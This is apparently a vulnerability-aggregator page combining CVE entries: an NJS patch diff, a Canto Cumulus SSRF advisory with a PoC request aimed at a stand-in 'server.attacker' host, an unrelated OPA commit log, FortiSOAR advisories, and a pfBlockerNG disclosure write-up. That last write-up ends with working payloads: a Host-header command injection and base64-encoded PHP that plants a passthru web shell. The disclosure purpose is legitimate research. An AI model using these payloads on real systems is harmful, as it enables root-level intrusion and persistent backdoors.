Nginx NJS v0.7.7 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h

**Demo patch**

diff --git a/src/njs\_string.c b/src/njs\_string.c
index 83cede5..8b3a31e 100644
\--- a/src/njs\_string.c
+++ b/src/njs\_string.c
@@ -2307,7 +2307,10 @@ njs\_string\_prototype\_last\_index\_of(njs\_vm\_t \*vm, njs\_value\_t \*args,
         }
 
         p = njs\_string\_offset(string.start, end, index);
\-
+        if (p == (u\_char\*)NJS\_ERROR) {
+            njs\_error(vm, "index too large");
+            return NJS\_ERROR;
+        }
         for (; p >= string.start; p = njs\_utf8\_prev(p)) {
             if ((p + s.size) <= end && memcmp(p, s.start, s.size) == 0) {
                 goto done;
@@ -2530,14 +2533,16 @@ njs\_string\_offset(const u\_char \*start, const u\_char \*end, size\_t index)
 {
     uint32\_t    \*map;
     njs\_uint\_t  skip;
\-
+    njs\_uint\_t  size = 0;
     if (index >= NJS\_STRING\_MAP\_STRIDE) {
         map = njs\_string\_map\_start(end);
 
         if (map\[0\] == 0) {
\-            njs\_string\_offset\_map\_init(start, end - start);
+            size = njs\_string\_offset\_map\_init(start, end - start);
+        }
+        if((index / NJS\_STRING\_MAP\_STRIDE) > size){
+            return (u\_char\*)NJS\_ERROR;
         }
\-
         start += map\[index / NJS\_STRING\_MAP\_STRIDE - 1\];
     }
 
@@ -2596,7 +2601,7 @@ njs\_string\_index(njs\_string\_prop\_t \*string, uint32\_t offset)
 }
 
 
\-void
+njs\_uint\_t
 njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size)
 {
     size\_t        offset;
@@ -2622,6 +2627,8 @@ njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size)
         offset--;
 
     } while (p < end);
+
+    return n;
 }
 
 
diff --git a/src/njs\_string.h b/src/njs\_string.h
index 99f9d14..7e5eaab 100644
\--- a/src/njs\_string.h
+++ b/src/njs\_string.h
@@ -244,7 +244,7 @@ njs\_int\_t njs\_string\_slice(njs\_vm\_t \*vm, njs\_value\_t \*dst,
 const u\_char \*njs\_string\_offset(const u\_char \*start, const u\_char \*end,
     size\_t index);
 uint32\_t njs\_string\_index(njs\_string\_prop\_t \*string, uint32\_t offset);
\-void njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size);
+njs\_uint\_t njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size);
 double njs\_string\_to\_index(const njs\_value\_t \*value);
 const char \*njs\_string\_to\_c\_string(njs\_vm\_t \*vm, njs\_value\_t \*value);
 njs\_int\_t njs\_string\_encode\_uri(njs\_vm\_t \*vm, njs\_value\_t \*args,

This fix is not standard, I just provides an idea.

CVE-2022-38890: Another way to trigger SEGV in njs_utf8_next cause oob read · Issue #569 · nginx/njs

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in All in One SEO plugin <= 4.2.3.1 at WordPress.

CVE-2022-38093: All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic

A Server-Side Request Forgery issue in Canto Cumulus through 11.1.3 allows attackers to enumerate the internal network, overload network resources, and possibly have unspecified other impact via the server parameter to the /cwc/login login form.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-023 Product: Canto Cumulus Manufacturer: Canto Inc. Affected Version(s): Through 11.1.3 Tested Version(s): 11.1.3 (Build 26f5823e) Vulnerability Type: Server-Side Request Forgery (CWE-918) Risk Level: High Solution Status: Mitigation possible Manufacturer Notification: 2022-03-25 Solution Date: No solution Public Disclosure: 2022-06-01 CVE Reference: Not yet assigned Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Canto Cumulus is a digital asset management (DAM).\[1\] Due to missing validation of untrusted input, the Cumulus web server is vulnerable to server-side request forgery (SSRF) with an unknown proprietary protocol. This behavior poses a risk for denial-of-service (DoS) attacks, impersonation attacks and attacks on the protocol with the theoretical result of remote code execution (RCE) or authentication bypass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When logging in to the web server via the form at the URL https://hostname.example/cwc/login, a hidden URL parameter 'server' is sent to the server in the respective HTTP POST request to https://hostname.example/cwc/catalog. Afterwards, the web server establishes a TCP connection to the system specified in that request via an unknown protocol. This yields the following problems: \* Denial of service: The web server keeps the TCP connection open for around 60 seconds. This could be misused to fill limited resources on the server or the server's infrastructure, e.g. NAT tables or connection pools, resulting in a DoS. \* Internal port scan: The web server would respond differently if it was able to establish a connection to the specified TCP port. An attacker could use this behavior to conduct a port scan on the internal network. \* Authentication bypass (theoretical): As the server is specified during authentication, it might be possible that the server-side request is used to verify the credentials given to the login form. An attacker could pretend to be an authentication server and forge a successful login or elevated privileges to the web application. \* Protocol attacks (theoretical): The server-side request uses an unknown binary protocol. An attacker might launch further attacks on that protocol, e.g. buffer overflow or deserialization attacks. In the worst case, if the server implementation of the protocol is vulnerable to such attacks, this will result in RCE on the server. SySS recommends restricting web server-side requests to a limited set of trusted servers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An attacker can specify an arbitrary IP address / hostname and port, as depicted in the following HTTP POST request: POST /cwc/catalog HTTP/1.1 Host: hostname.example User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:98.0) Gecko/20100101 Firefox/98.0 Content-Type: application/x-www-form-urlencoded Content-Length: 123 OWASP\_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80 During the response, the web server connects to the specified TCP port on the specified host via an unknown proprietary protocol: # ncat -nlvp 80 | hexdump -C Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from \[WAN IP\]. Ncat: Connection from \[WAN IP\]:10402. 00000000 00 00 00 28 72 65 63 6f 00 00 00 02 00 00 00 04 |...(reco........| 00000010 63 4d 49 44 4c 6f 6e 67 73 69 52 51 00 00 00 04 |cMIDLongsiRQ....| 00000020 53 65 72 23 4c 6f 6e 67 00 04 77 7b 00 00 00 18 |Ser#Long..w{....| 00000030 72 65 63 6f 00 00 00 01 00 00 00 04 63 4d 49 44 |reco........cMID| 00000040 4c 6f 6e 67 51 75 69 74 |LongQuit| 00000048 If the specified host responds in an unexpected way, the web server closes the server-side connection and responds to the initial HTTP request with HTTP error code 302 and a redirection to an error page: HTTP/1.1 302 Server: nginx Date: Wed, 23 Mar 2022 16:31:43 GMT Content-Type: text/json;charset=utf-8 Content-Length: 0 Connection: keep-alive Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=16070400 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true If the DNS name cannot be resolved or if the specified TCP port is unreachable, the server responds with HTTP error code 500 and renders the login form with HTML containing an additional error message which states that the server could not be reached. This differing behavior enables the internal port scan. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer has not released a patch and will not address the vulnerability. The manufacturer recommends securing the Cumulus server by using a firewall. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-03-18: Vulnerability discovered 2022-03-25: Vulnerability reported to the manufacturer 2022-05-11: Manufacturer informed SySS that it will not address the vulnerability 2022-06-01: Public disclosure of the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Canto Cumulus https://www.canto.com/de/cumulus/ \[2\] SySS Security Advisory SYSS-2022-023 (not yet published) https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud\_Kehler.asc Key ID: 0xB645 7D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmKWCXIACgkQ6ceYZrZF fXqI7A//ZiwtJccj1fcb1EcVK1l4jHU3ZXcJrcYFib4jqzYgZ+NQXA1OVFmJ8P9a MaK9/9GCTjRUnHL0zJfv2Q18GwDaFcq3Ecv61l0IttgOwPmZk3bdGhbiZbuNkid9 n8WBCtzMoPYb8b8BvGDmbjhGcIWfLBJ4hf9nspeIP12MtYNe0qwYXQJsDrZwmUgu bqD5AnXItyYSDe690LRweAh5vAtdvtp+7SQLOPfi49QyG9sxb9jw1qsK8KVZNutt nIwSD5SFrCCgVvEn6E02FHGW7ttEivxSPTN60FsoGhhCD7V1zeu2teNaZvarETek cnSuYgNNBCdPhCm6WDDMgw5vNOUqg0UE1CqZjZ84DBOu4ABBMF4PV9JBFYbOeWTK XYmVsREJVFnvF+qmXDVfEoByaKsXX1yIZkJwGYFXGS3bvFpaipMGLbRFzc49abPI sv5Vth94AmnTyHsG73tM93d3y5BRLpwxwuRSmG5PRzbuZet8ThPH4Hoc1OAysNTa zsCm3VkSemX0Ba8z6mL4IwuknYoetuKQli37jAx7jGsfetFc9tKvHsk3dQ9w+wQG 040DaLa8NsBh+b1PeQZj6AVC+qH6OgGADl5l0Dnh3VcQW3eWUV0YgQofgOsbili6 6CGZNJwE8HkWX5U4HuTaF/A3b8BaFd0IailYTDGc3SaLz4XOAyU= =FDje -----END PGP SIGNATURE-----

CVE-2022-40305

Open Policy Agent (OPA) is an open source, general-purpose policy engine. The Rego compiler provides a (deprecated) `WithUnsafeBuiltins` function, which allows users to provide a set of built-in functions that should be deemed unsafe â€” and as such rejected â€” by the compiler if encountered in the policy compilation stage. A bypass of this protection has been found, where the use of the `with` keyword to mock such a built-in function (a feature introduced in OPA v0.40.0), isnâ€™t taken into account by `WithUnsafeBuiltins`. Multiple conditions need to be met in order to create an adverse effect. Version 0.43.1 contains a patch for this issue. As a workaround, avoid using the `WithUnsafeBuiltins` function and use the `capabilities` feature instead.

Signed-off-by: Damien Burks <damien@damienjburks.com>

updating changes to allow for multiple format strings

Signed-off-by: Damien Burks <damien@damienjburks.com>

fixing golint issues

Signed-off-by: Damien Burks <damien@damienjburks.com>

fixing golint issues

Signed-off-by: Damien Burks <damien@damienjburks.com>

making recommended change: package level variable

Signed-off-by: Damien Burks <damien@damienjburks.com>

adding support for explicit argument indexes

Signed-off-by: Damien Burks <damien@damienjburks.com>

format: don't add 'in' keyword import when 'every' is there (open-policy-agent#4607)

Also ensure that added imports have a location set.

Previously, \`opa fmt\` on the added test file would have panicked
because the import hadn't had a location.

Fixes open-policy-agent#4606.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

ast+topdown+planner: allow for mocking built-in functions via "with" (open-policy-agent#4540)

With this change, we can replace calls to built-in functions via \`with\`. The replacement
can either be a value -- which will be used as the return value for every call to the
mocked built-in -- or a reference to a non-built-in function -- when the results need
to depend on the call's arguments.

Compiler, topdown, and planner have been adapted in this change. The included
docs changes describe the replacement options further.

Fixes first part of open-policy-agent#4449. (Missing are non-built-in functions as mock targets.)

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

build(deps): bump google.golang.org/grpc from 1.45.0 to 1.46.0 (open-policy-agent#4617)

docs/policy-testing: use assignment operator in mocks (open-policy-agent#4618)

Additionally, simplify one test example.

Signed-off-by: Anders Eknert <anders@eknert.com>

cmd/capabilities: expose capabilities through CLI (open-policy-agent#4588)

There is a new command argument "capabilities". With this, it is
possible to print the current capabilities version, show all
capabilities versions & print any capabilities version, without the need
of a file. Moreover, for the other commands which use the --capabilities
flag, it is possible to give only the version number, without specifying
a file. However, there are no breaking changes for those who use the
capabilities file as an input for the flag. Unit tests were also
written, in order to test the new argument and the changes made in ast.

Fixes: open-policy-agent#4236

Signed-off-by: IoannisMatzaris <matzarisioannis@gmail.com>

format,eval: don't use source locations when formatting PE output (open-policy-agent#4611)

\* format: allow ignoreing source locations
\* cmd/eval: format disregarding source locations for partial result

Before, we'd see this output:
\`\`\`
$ opa eval -p -fsource 'time.clock(input.x)==time.clock(input.y)'
time.clock(time.clock(input.x), input.y)
\`\`\`

Now, we get the proper answer: \`time.clock(input.y, time.clock(input.x))\`.

Note that it's a \_display\_ issue; the JSON output of PE has not been affected.

Fixes open-policy-agent#4609.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

build(deps): bump github/codeql-action from 1 to 2 (open-policy-agent#4621)

Bumps \[github/codeql-action\](https://github.com/github/codeql-action) from 1 to 2.
- \[Release notes\](https://github.com/github/codeql-action/releases)
- \[Changelog\](https://github.com/github/codeql-action/blob/main/CHANGELOG.md)
- \[Commits\](github/codeql-action@v1...v2)

---
updated-dependencies:
- dependency-name: github/codeql-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

status: Remove activeRevision label on all but one metric (open-policy-agent#4600)

Having one activeRevision label on each of the prometheus metrics emitted
by the status plugin has proven to be problematic with a large number of
bundles. So with this change,

1. we keep the activeRevision label (just on) the last\_success\_bundle\_activation metric.
2. the gauge gets reset, so we only keep the last active\_revision (instead of keeping
   them all and therefore avoiding the situation where the /metrics output grows indefinitely)

Fixes open-policy-agent#4584.

Signed-off-by: cmuraru <cmuraru@adobe.com>

website: add playground button to navbar (open-policy-agent#4622)

Addressing one tiny bit of open-policy-agent#4614.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

topdown/net: require prefix length for IPv6 in net.cidr\_merge (open-policy-agent#4613)

There are no default prefixes in IPv6, so if an IPv6 without a prefix is fed into
net.cidr\_merge, we'll return a non-halt error now.

Before, we'd fail in various ways if a prefix-less IPv6 was fed into
\`net.cidr\_merge\`. With only one, we'd return \`\[ "<nil>" \]\`, with two,
we'd panic.

Fixes open-policy-agent#4596.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

Dockerfile: add source annotation (open-policy-agent#4626)

\`org.opencontainers.image.source\` URL to get source code for building the image (string)

https://github.com/opencontainers/image-spec/blob/main/annotations.md

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

build(deps): bump github.com/fsnotify/fsnotify v1.5.2 -> v1.5.4 (open-policy-agent#4628)

https://github.com/fsnotify/fsnotify/releases/tag/v1.5.4

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

docs: update version in kubernetes examples (open-policy-agent#4627)

Signed-off-by: yongen.pan <yongen.pan@daocloud.io>

bundle/status: Include bundle type in status information

OPA has support for Delta Bundles. The status object already
contains valuable information such as last activation timestamp but
does not specify if the bundle was a canonical snapshot or delta.

This change updates the bundle.Status object to include the
bundle type string: either "snapshot" or "delta". This can be useful
for status endpoints to differentiate between the bundle types.

Issue: 4477

Signed-off-by: Bryan Fulton <bryan@styra.com>

ast+topdown+planner: replacement of non-built-in functions via 'with' (open-policy-agent#4616)

Follow-up to open-policy-agent#4540

We can now mock functions that are user-defined:

    package test

    f(\_) = 1 {
        input.x = "x"
    }
    p = y {
        y := f(1) with f as 2
    }

...following the same scoping rules as laid out for built-in mocks.
The replacement can be a value (replacing all calls), or a built-in,
or another non-built-in function.

Also addresses bugs in the previous slice:
\* topdown/evalCall: account for empty rules result from indexer
\* topdown/eval: capture value replacement in PE could panic

Note: in PE, we now drop 'with' for function mocks of any kind:

These are always fully replaced in the saved support modules, so
this should be OK.

When keeping them, we'd also have to either copy the existing definitions
into the support module; or create a function stub in it.

Fixes open-policy-agent#4449.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

format: keep whitespaces for multiple indented same-line withs (open-policy-agent#4635)

Fixes open-policy-agent#4634.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

downloader: support for downloading bundles from an OCI registry (open-policy-agent#4558)

Initial support for open-policy-agent#4518.

Configuration uses the 'services' config for registries, via the "type: oci" field.
Bundles configured to pull from that service will then use OCI.

\`\`\`
services:
  ghcr-registry:
    url: https://ghcr.io
    type: oci
bundles:
  authz:
    service: ghcr-registry
    resource: ghcr.io/${ORGANIZATION}/${REPOSITORY}:${TAG}
    persist: true
    polling:
      min\_delay\_seconds: 60
      max\_delay\_seconds: 120
persistence\_directory: ${PERSISTENCE\_PATH}
\`\`\`

Service credentials are supported: if you want to pull from a private registry,
use
\`\`\`
services:
  ghcr-registry:
    url: https://ghcr.io
    type: oci
    credentials:
      bearer:
        token: ${GH\_PAT}
\`\`\`

If no \`persistence\_directory\` is configured, the data is stored in a directory under /tmp.

See docs/devel/OCI.md for manual steps to test this feature with some
OCI registry (like ghcr.io).

Signed-off-by: carabasdaniel <dani@aserto.com>

Prepare v0.40.0 Release (open-policy-agent#4631)

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

Prepare v0.41.0 development (open-policy-agent#4636)

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

docs: Adding example for \`rego.metadata.role()\` usage (open-policy-agent#4640)

Signed-off-by: Johan Fylling <johan.dev@fylling.se>

build(deps): bump oras.land/oras-go from 1.1.0 to 1.1.1 (open-policy-agent#4643)

Bumps \[oras.land/oras-go\](https://github.com/oras-project/oras-go) from 1.1.0 to 1.1.1.
- \[Release notes\](https://github.com/oras-project/oras-go/releases)
- \[Commits\](oras-project/oras-go@v1.1.0...v1.1.1)

---
updated-dependencies:
- dependency-name: oras.land/oras-go
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

build(deps): bump OpenTelemetry 1.6.3 -> 1.7.0 (open-policy-agent#4649)

https://github.com/open-telemetry/opentelemetry-go/releases/tag/v1.7.0
https://github.com/open-telemetry/opentelemetry-go-contrib/releases/tag/v1.7.0

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

build(deps): bump github.com/containerd/containerd from 1.6.2 to 1.6.3 (open-policy-agent#4654)

Bumps \[github.com/containerd/containerd\](https://github.com/containerd/containerd) from 1.6.2 to 1.6.3.
- \[Release notes\](https://github.com/containerd/containerd/releases)
- \[Changelog\](https://github.com/containerd/containerd/blob/main/RELEASES.md)
- \[Commits\](containerd/containerd@v1.6.2...v1.6.3)

---
updated-dependencies:
- dependency-name: github.com/containerd/containerd
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

Update k8s examples to the latest schema (open-policy-agent#4655)

Signed-off-by: Víctor Martínez Bevià <vicmarbev@gmail.com>

Fix incorrect padding claims (open-policy-agent#4657)

Signed-off-by: Anders Eknert <anders@eknert.com>

build(deps): bump github.com/containerd/containerd from 1.6.3 to 1.6.4 (open-policy-agent#4662)

Bumps \[github.com/containerd/containerd\](https://github.com/containerd/containerd) from 1.6.3 to 1.6.4.
- \[Release notes\](https://github.com/containerd/containerd/releases)
- \[Changelog\](https://github.com/containerd/containerd/blob/main/RELEASES.md)
- \[Commits\](containerd/containerd@v1.6.3...v1.6.4)

---
updated-dependencies:
- dependency-name: github.com/containerd/containerd
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

build(deps): bump docker/setup-qemu-action from 1 to 2 (open-policy-agent#4668)

build(deps): bump docker/setup-buildx-action from 1 to 2 (open-policy-agent#4669)

Bumps \[docker/setup-buildx-action\](https://github.com/docker/setup-buildx-action) from 1 to 2.
- \[Release notes\](https://github.com/docker/setup-buildx-action/releases)
- \[Commits\](docker/setup-buildx-action@v1...v2)

---
updated-dependencies:
- dependency-name: docker/setup-buildx-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

build(deps): github.com/bytecodealliance/wasmtime-go 0.35.0 -> 0.36.0 (open-policy-agent#4652)

\* build(deps): bump wasmtime-go: 0.35.0 -> 0.36.0
\* internal/wasm: adapt to using epoch-based interruption

Looks like we don't get frames for this.

Also, there is currentlty no better way than comparing the message,
as the trap code isn't surfaced (yet).

Fixes open-policy-agent#4663.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

ecosystem: Add Sansshell (open-policy-agent#4674)

Signed-off-by: James Chacon <james.chacon@snowflake.com>

topdown: Add units.parse builtin (open-policy-agent#4676)

This function works on all base decimal and binary SI units of the set:

    m, K/Ki, M/Mi, G/Gi, T/Ti, P/Pi, and E/Ei

Note: Unlike \`units.parse\_bytes\`, this function is case sensitive.

Fixes open-policy-agent#1802.

Signed-off-by: Philip Conrad <philipaconrad@gmail.com>

docs/contrib-code: Add capabilities step to built-in functions tutorial (open-policy-agent#4677)

Signed-off-by: Philip Conrad <philipaconrad@gmail.com>

Add nginx integration (open-policy-agent#4682)

Signed-off-by: Anders Eknert <anders@eknert.com>

util/Unmarshal: if it's JSON, skip YAMLtoJSON (open-policy-agent#4681)

This helper accepts JSON or YAML, and used to do this:

1. For YAML input, yaml.YAMLToJSON would parse it as yaml, marshal it to
   JSON, and pass that back out to be passed to UnmarshalJSON
2. For JSON input, yaml.YAMLToJSON would also parse it as yaml, marshal it
   to JSON, and pass that back out to UnmarshalJSON

Issue open-policy-agent#4673 has shown that the theoretical "superset" propery of YAML doesn't
seem to hold in all cases.

So now, we'll do this:

1. For YAML input, yaml.YAMLToJSON would parse it as yaml, marshal it to
   JSON, and pass that back out to be passed to UnmarshalJSON
2. For JSON input, json.Valid will determine that it's JSON, and we'll
   feed it into UnmarshalJSON as-is.

The YAML path (1.) still seems suboptimal, but I also suspect that JSON is
more common. Also, this change shouldn't make the YAML path much worse:
determining that yaml string isn't valid JSON should be quick.

Signed-off-by: Stephan Renatus <stephan.renatus@gmail.com>

OCI: skip reloading bundle if tarball SHA did not change (open-policy-agent#4658)

Fixes open-policy-agent#4637.

Signed-off-by: carabasdaniel <dani@aserto.com>

docs/content: Correct --tls-ca-cert-path in security doc (open-policy-agent#4686)

Change --tls-ca-cert-path to --tls-ca-cert-file since --tls-ca-cert-path
is not a valid option (and a typo)

Fixes: open-policy-agent#4678

Signed-off-by: Krishna Pramod A <krishna.adharapurapu@rakuten.com>

refactoring: adding helper method for sprintf

CVE-2022-36085: compiler: allow for mocking built-in functions via "with" by srenatus · Pull Request #4540 · open-policy-agent/opa

Multiple relative path traversal vulnerabilities [CWE-23] in Fortinet FortiSOAR before 7.2.1 allows an authenticated attacker to write to the underlying filesystem with nginx permissions via crafted HTTP requests.

** PSIRT Advisories**

**FortiSOAR - Path traversal vulnerabilities in the web API**

**Summary**

Multiple relative path traversal vulnerabilities \[CWE-23\] in the web API of FortiSOAR may allow an authenticated attacker to write in the underlying filesystem with nginx permissions via crafted HTTP requests.

**Affected Products**

FortiSOAR version 7.2.0  
FortiSOAR version 7.0.0 through 7.0.2

**Solutions**

Please upgrade to FortiSOAR version 7.2.1 or above  
Please upgrade to FortiSOAR version 7.0.3 or above

**Acknowledgement**

Fortinet is pleased to thank security researchers Ryan Catterall and OJ Reeves of Beyond Binary for discovering and reporting this vulnerability under responsible disclosure.

CVE-2022-29062: Fortiguard

An improper privilege management vulnerability [CWE-269] in Fortinet FortiSOAR before 7.2.1 allows a GUI user who has already found a way to modify system files (via another, unrelated and hypothetical exploit) to execute arbitrary Python commands as root.

** PSIRT Advisories**

**FortiSOAR - Privilege escalation from nginx user to root**

**Summary**

An improper privilege management vulnerability \[CWE-269\] in FortiSOAR may allow a GUI user who has already found a way to modify system files (via another, unrelated and hypothetical exploit) to execute arbitrary Python commands as root.

**Affected Products**

FortiSOAR version 7.2.0  
FortiSOAR version 7.0.0 through 7.0.2  
FortiSOAR version 6.4.0 through 6.4.4

**Solutions**

Please upgrade to FortiSOAR version 7.2.1 or above  
Please upgrade to FortiSOAR version 7.0.3 or above

**Acknowledgement**

Fortinet is pleased to thank security researchers Ryan Catterall and OJ Reeves of Beyond Binary for discovering and reporting this vulnerability under responsible disclosure.

CVE-2022-30298: Fortiguard

pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.

**TL;DR**

IHTeam undertook an independent security assessment of pfsense’s pfBlockerNG plugin version 2.1.4\_26 and identified the following vulnerability:

*   Unauthenticated Remote Command Execution as root (CVE-2022-31814)

**What’s pfBlockerNG**

pfBlockerNG (https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html) is a pfSense plugin that is NOT installed by default and it’s generally used to block inbound connections from whole countries or IP ranges.

**CVE-2022-31814**

IHTeam identified a remote command execution vulnerability in **pfBlockerNG <= 2.1.4\_26** that can be exploited from an unauthenticated perspective.

Fig 1: Image showing the installed pfBlockerNG plugin

Being the web server run by the root user, the impact of this vulnerability is critical, with a CVSS 3.0 score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

The consultant downloaded the latest stable version of pfSense (2.6.0 at the moment of writing) and installed the latest stable version of pfBlockerNG (2.1.4\_26 at the moment of writing).

The vulnerability was identified in the file **/usr/local/www/pfblockerng/www/index.php** which is used to record and query DNSBL data. Specifically to query, the code uses PHP function **exec()**, passing untrusted data into the command.

    // Query DNSBL Alias for Domain List.
    $query = str_replace('.', '\.', htmlspecialchars($_SERVER['HTTP_HOST']));
    
    exec("/usr/bin/grep -l ' \"{$query} 60 IN A' /var/db/pfblockerng/dnsblalias/*", $match);

The **$\_SERVER\[‘HTTP\_HOST’\]** element passed in the above code, is a user-controllable input that could result in changing the meaning of the command (as originally intended). An attacker can tamper with the HTTP\_HOST parameter via the “**Host**:” header of the request, as shown in the picture below:

Fig 2: Image showing the “Host” header value reflected in command

—**Restrictions on characters**—

There were few restrictions in place regarding characters you could use:

*   htmlspecialchars() PHP function was preventing the use of shell redirections (> and <), double quotes (“), and ampersand (&)

Fig 3: Image showing how “&” was encoded in HTML when used

*   nginx web server won’t accept the forward slash (/) in the Host header, returning a 400 – Bad Request

Fig 4: Image showing nginx returning 400

Therefore, the only available characters to build a working payload were:

*   pipe (|)
*   semicolon (;)
*   single quote (‘)
*   spaces ( )

**–Simple proof of concept–**

To easily identify a valid payload, we can copy the original command in the exec() function and try to tamper with it directly in a shell:

    /usr/bin/grep -l ' "INJECTION 60 IN A' /var/db/pfblockerng/dnsblalias/*

In order to obtain a working PoC, we need:

1.  Close the single quote
2.  Specify a directory to search on
3.  Break the command with a semicolon
4.  Comment or add an additional single quote

    ' *; sleep 5; '

The above simple proof of concept made the system delay the request for 5 seconds, confirming the injection worked.

**–Backdooring pfSense–**

The next step would involve the build of a stable shell on the remote machine and to do so, we would need to find a creative way to (at least) write a PHP file.

Remember that we can’t use redirections or even forward slashes, therefore the consultant utilized base64 to write a more complex payload that could be executed via php-cli.

However, the “base64 -d” binary was not installed by default in pfSense, but python3.8 was, therefore we were able to write and decode base64 payloads and pipe everything in the php-cli binary:

*   Simple PHP code

    <?echo("HELL");?>

*   Encode it in base64

    PD9lY2hvKCJIRUxMIik7Pz4=

*   Use python to decode the base64

    python3.8 -m base64 -d

*   Pipe everything into PHP

    | php

Fig 5: Image showing the “echo” message successfully executed by PHP

Keep in mind that base64 has forward slashes (/) in its charset – therefore build a payload that doesn’t include them.

Now that we got back the “HELL” message, we know that PHP successfully executed our payload, we can build a more complex payload to backdoor pfSense.

    <?$a=fopen("/usr/local/www/system_advanced_control.php","w") or die();$t='<?php print(passthru( $_GET["c"]));?>';fwrite($a,$t);fclose( $a);?>

It creates a file in **/usr/local/www/system\_advanced\_control.php** with a very simple call to execute command and get back results from it.

    PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+

